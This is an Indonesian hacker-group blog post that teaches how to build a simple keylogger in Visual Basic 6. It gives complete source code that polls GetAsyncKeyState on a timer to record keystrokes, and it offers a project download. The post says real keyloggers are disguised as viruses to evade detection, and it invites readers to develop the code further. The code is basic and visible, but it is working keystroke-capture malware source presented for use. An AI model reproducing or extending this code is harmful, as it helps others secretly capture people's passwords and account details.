WELCOME TO NINETHREE TEAM OFFICAL BLOG

"We Are The Rules Makers" "We Don't Forgive" "We Don't Forget" "We Are The Rules BREAKERS" "We Are The Bess & We Are InvinCibl3 Cyber Hunt3rs" "RESPECT US" "FEAR US" WE ARE FAMILY

Jumat, 31 Agustus 2012

Membuat KeyLogger sederhana dengan VB 6

·


15042009

Pernah dengar Keylogger ? Tentunya pernah bagi anda yang suka berkutat dengan dunia komputer dan internet. Karena penting bagi kita, untuk menjaga privasi (password dan akun) yang kita miliki dalam dunia maya. Karena bisa saja saat kita berselancar di dunia netting, dengan menggunakan komputer orang lain (warnet/teman) telah dipasang suatu alat lunak bernama Keylogger untuk mencatat aktifitas yang kita ketikan melalui keybord. Tuing…. Bisa saja akun email, blog,web, dll di ambil alih oleh orang yang memanfatkan Keylogger tersebut. Bagai mana she membuat keylogger, Key logger sesungguhnya biasanya di jadikan seperti virus agar tidak bisa terdeteksi keberadanya. Namun tujuan utamanya hanya satu, yaitu mencatat aktifitas key board. Kali ini kita akan membuat keylogger sederhana (fungsi utama), yang mampu mencatat aktifitas user yang dilakukan melalui tombol keyboard. Okay, dalam tutor ini kita memakai visual basic 6.0, bagi anda yang suka bercoding bahasa lain juga tidak masalah karena yang kita butuhkan disini hanyalah 1 fungsi API. Pembuatan Taruhlah 2 komponen pada form, yaitu Textbox dan Timer dengan properti sbb:
Timer (name:Timer1,interval:200)
Textbox(name:Text1,Multiline:True)
Lihat gambar berikut !
Lalu tuliskan codingnya di balik jendela code form !
Private Declare Function GetAsyncKeyState Lib “user32″ (ByVal vKey As Long) As Integer
Private Function GetKey() As String
Dim Num As Byte
For Num = 33 To 122
If GetAsyncKeyState(Num) <> 0 Then
GetKey = Chr(Num)
Exit For
End If
Next
End Function
Private Sub Timer1_Timer()
Text1.Text = Text1.Text & GetKey
End Sub
Penjelasan
GetAsyncKeyState, adalah fungsi API untuk mengecek apakah sedang ada tombol yang ditekan (dengan nilai ASC dalam parameternya). Maka jika ada tombol yang sedang di tekan (dengan nilai asc pada paramaternya – vKey) dia akan mengembalikan nilai bukan 0 (ndok), namun jika saat dia dipanggil tidak ada tombol yang ditekan maka dia mengembalikan nilai 0 (ndok)
Interval 200, pada timer menunjukan, proses pengecekan dilakukan 1/5 detik. Dengan kecepatan ini, terkadang Keylogger menangkap 1 tombol dengan 2 kali output. Namun ini lebih baik, dari pada kita memakai interval yang rendah, karena bisa saja ketikan tidak tertangkap dengan sempurna.
Textbox,kita pakai untuk menampung ketikan user.
OK kira – kira cukup sampai disini, bias dikembangkan sendiri.Silahkan jalankan maka program akan menangkap aktifitas tangan pada keyboard anda bukan pada celana anda lho.. Ha9x. :)
Download contoh projeknya !

0 komentar:

LOGIN


[ My Facebook ]

[ Info ]

Tempat Ngobrol